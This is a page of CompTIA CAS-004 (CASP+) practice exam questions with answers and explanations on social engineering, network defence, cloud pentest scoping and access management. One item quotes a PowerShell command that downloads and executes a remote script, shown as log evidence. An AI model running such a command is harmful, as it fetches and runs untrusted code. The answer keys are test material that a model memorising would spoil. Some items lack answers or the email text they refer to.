Practice Free CAS-004 Exam Online Questions
An accounting team member received a voicemail message from someone who sounded like the Chief Financial Officer (CFO). In the voicemail message, the caller requested a wire transfer to a bank account the organization had not used before.
Which of the following best describes this type of attack?
- A . The attacker used deepfake technology to simulate the CFO’s voice.
- B . The CFO tried to commit a form of embezzlement.
- C . The attacker used caller ID spoofing to imitate the CFO’s internal phone extension.
- D . The attacker successfully phished someone in the accounts payable department.
A
Explanation:
In this scenario, the voicemail requesting a wire transfer to an unfamiliar bank account is indicative of a deepfake attack, where attackers use advanced technology to simulate a person’s voice or likeness. Deepfake technology is increasingly being used in social engineering attacks to impersonate executives or trusted individuals. This attack attempts to manipulate employees by making them believe they are receiving legitimate requests from high-ranking personnel. CASP+ discusses advanced threats like deepfakes, which leverage AI to bypass traditional security awareness defenses.
Reference: CASP+ CAS-004 Exam Objectives: Domain 2.0 – Enterprise Security Operations (Advanced Social Engineering Threats)
CompTIA CASP+ Study Guide: Social Engineering and Deepfake Risks
A software developer has been tasked with creating a unique threat detection mechanism that is based on machine learning. The information system for which the tool is being developed is on a rapid CI/CD pipeline, and the tool developer is considered a supplier to the process.
Which of the following presents the most risk to the development life cycle and to the ability to deliver the security tool on time?
- A . Deep learning language barriers
- B . Big Data processing required for maturity
- C . Secure, multiparty computation requirements
- D . Computing capabilities available to the developer
B
Explanation:
The most significant risk to the development of a machine-learning-based threat detection tool is the Big Data processing required for maturity. Machine learning models often require large datasets to train effectively, and processing and analyzing this data can be time-consuming and resource-intensive. This can delay the development timeline, especially in a rapid CI/CD pipeline environment where timely delivery is crucial. CASP+ highlights the challenges associated with machine learning and Big Data in security tool development, particularly the resource demands and the need for extensive data to ensure accuracy and maturity.
Reference: CASP+ CAS-004 Exam Objectives: Domain 2.0 – Enterprise Security Operations (Big Data and Machine Learning Challenges)
CompTIA CASP+ Study Guide: Implementing and Managing Machine Learning in Security Environments
While performing mandatory monthly patch updates on a production application server, the security analyst reports an instance of buffer overflow for a new application that was migrated to the cloud and is also publicly exposed. Security policy requires that only internal users have access to the application.
Which of the following should the analyst implement to mitigate the issues reported? (Select two).
- A . Configure firewall rules to block all external traffic.
- B . Enable input validation for all fields.
- C . Enable automatic updates to be installed on all servers.
- D . Configure the security group to enable external traffic.
- E . Set up a DLP policy to alert for exfiltration on all application servers.
- F . Enable nightly vulnerability scans.
A company is looking to fortify its cybersecurity defenses and is focusing on its network infrastructure. The solution must not affect the availability of the company’s services, so false positives must not cause legitimate traffic to be dropped.
Which of the following would satisfy the requirement?
- A . NIDS
- B . NIPS
- C . WAF
- D . Reverse proxy
A
Explanation:
A NIDS (Network Intrusion Detection System) is a security solution that monitors network traffic for signs of malicious activity, such as attacks, intrusions, or policy violations. A NIDS does not affect the availability of the company’s services because it operates in passive mode, which means it does not block or modify traffic. Instead, it alerts the network administrator or other security tools when it detects an anomaly or threat.
Reference:
https://subscription.packtpub.com/book/networking-and-servers/9781782174905/5/ch05lvl1sec38/differentiating-between-nids-and-nips
https://owasp.org/www-community/controls/Intrusion_Detection
https://www.cisco.com/c/en/us/products/security/what-is-network-intrusion-detection-system.html
https://www.imperva.com/learn/application-security/network-intrusion-detection-system-nids/
A company recently migrated its critical web application to a cloud provider’s environment. As part of the company’s risk management program, the company intends to conduct an external penetration test. According to the scope of work and the rules of engagement, the penetration tester will validate the web application’s security and check for opportunities to expose sensitive company information in the newly migrated cloud environment.
Which of the following should be the first consideration prior to engaging in the test?
- A . Prepare a redundant server to ensure the critical web application’s availability during the test.
- B . Obtain agreement between the company and the cloud provider to conduct penetration testing.
- C . Ensure the latest patches and signatures are deployed on the web server.
- D . Create an NDA between the external penetration tester and the company.
B
Explanation:
Before conducting a penetration test in a cloud environment, it is critical to first obtain permission from the cloud service provider. Cloud providers often have strict rules about penetration testing to avoid unintended service disruptions or violations of service agreements. Without this agreement, the company could face legal or operational consequences. This aligns with CASP+ best practices, which emphasize the importance of securing approval and understanding shared responsibility models in cloud environments before engaging in security testing.
Reference: CASP+ CAS-004 Exam Objectives: Domain 1.0 – Risk Management (Penetration Testing in Cloud Environments)
CompTIA CASP+ Study Guide: Cloud Security and Legal Considerations for Penetration Testing
An organization has several legacy systems that are critical to testing currently deployed assets. These systems have become a serious risk to the organization’s security posture, and the security manager must implement protection measures to prevent critical infrastructure from being impacted. The systems must stay interconnected to allow communication with the deployed assets.
Which of the following designs, if implemented, would decrease the most risks but still meet the requirements?
- A . Software-defined networking
- B . Containerization
- C . Air gap
- D . Screened subnet
D
Explanation:
Problem Statement:
- The organization needs to secure legacy systems while maintaining interconnectivity with deployed assets.
- Legacy systems are inherently vulnerable and can pose risks if directly connected to critical infrastructure.
- The goal is to minimize risks without breaking connectivity.
Why the Correct Answer is D (Screened Subnet):
A screened subnet (often called a DMZ, or demilitarized zone) is a network segment that isolates potentially risky systems from the internal network. It is typically placed between two firewalls:
- One firewall separates the DMZ from the external network (internet).
- The other firewall isolates the DMZ from the internal network.
This setup allows controlled communication between legacy systems and internal assets while minimizing risk.
Key Benefits of a Screened Subnet:
- Isolation: Separates legacy systems from the critical internal network.
- Controlled Access: Uses firewall rules to restrict inbound and outbound traffic.
- Reduced Attack Surface: Limits the potential impact of a compromised legacy system.
- Interconnectivity Maintenance: Enables communication with deployed assets without direct exposure.
Example Scenario:
A company has legacy industrial control systems (ICS) that need to interact with modern monitoring tools. Placing the ICS within a screened subnet ensures:
- Data flow is regulated.
- Monitoring systems can still access ICS data without risking full network exposure.
- Compromise of the legacy system does not automatically mean compromise of the core network.
A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: `powershell EX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois`
Which of the following security controls would have alerted and prevented the next phase of the attack?
- A . Antivirus and UEBA
- B . Reverse proxy and sandbox
- C . EDR and application approved list
- D . Forward proxy and MFA
C
Explanation:
EDR combined with an application approved list (whitelist) would both alert on and prevent the next phase of this attack: the approved list blocks the downloaded, unapproved script from executing, while the EDR agent detects and alerts on PowerShell downloading and running remote content from the jump box.
A security analyst is investigating a series of suspicious emails reported by employees to the security team. The emails appear to come from a current business partner and do not contain images or URLs. No images or URLs were stripped from the messages by the security tools the company uses; instead, the emails include only the following in plain text.
Which of the following should the security analyst perform?
- A . Contact the security department at the business partner and alert them to the email event.
- B . Block the IP address for the business partner at the perimeter firewall.
- C . Pull the devices of the affected employees from the network in case they are infected with a zero-day virus.
- D . Configure the email gateway to automatically quarantine all messages originating from the business partner.
A
Explanation:
The best option for the security analyst to perform is to contact the security department at the business partner and alert them to the email event. The email appears to be a phishing attempt that tries to trick the employees into revealing their login credentials by impersonating a legitimate sender. The security department at the business partner should be notified so they can investigate the source and scope of the attack and take appropriate actions to protect their systems and users.
Reference:
https://www.comptia.org/training/books/casp-cas-004-study-guide
https://us-cert.cisa.gov/ncas/tips/ST04-014
A security engineer has learned that terminated employees’ accounts are not being disabled. The termination dates are updated automatically in the human resources information system software by the appropriate human resources staff.
Which of the following would best reduce risks to the organization?
- A . Exporting reports from the system on a weekly basis to disable terminated employees’ accounts
- B . Granting permission to human resources staff to mark terminated employees’ accounts as disabled
- C . Configuring allowed login times for all staff to only work during business hours
- D . Automating a process to disable the accounts by integrating Active Directory and human resources information systems
D
Explanation:
The best way to reduce the risk of terminated employees’ accounts not being disabled is to automate the process by integrating Active Directory (AD) with the human resources information system (HRIS). By automating this integration, when an employee’s termination date is updated in the HRIS, the corresponding account in AD is automatically disabled, reducing the risk of accounts being left active after an employee leaves the organization. CASP+ highlights the importance of automating security processes, especially for user access management, to minimize human error and ensure timely action.
Reference: CASP+ CAS-004 Exam Objectives: Domain 2.0 – Enterprise Security Operations (Automation of User Access Management)
CompTIA CASP+ Study Guide: Integration of HR Systems and Active Directory for Account Management
An organization is prioritizing efforts to remediate or mitigate risks identified during the latest assessment. For one of the risks, a full remediation was not possible, but the organization was able to successfully apply mitigations to reduce the likelihood of impact.
Which of the following should the organization perform NEXT?
- A . Assess the residual risk.
- B . Update the organization’s threat model.
- C . Move to the next risk in the register.
- D . Recalculate the magnitude of impact.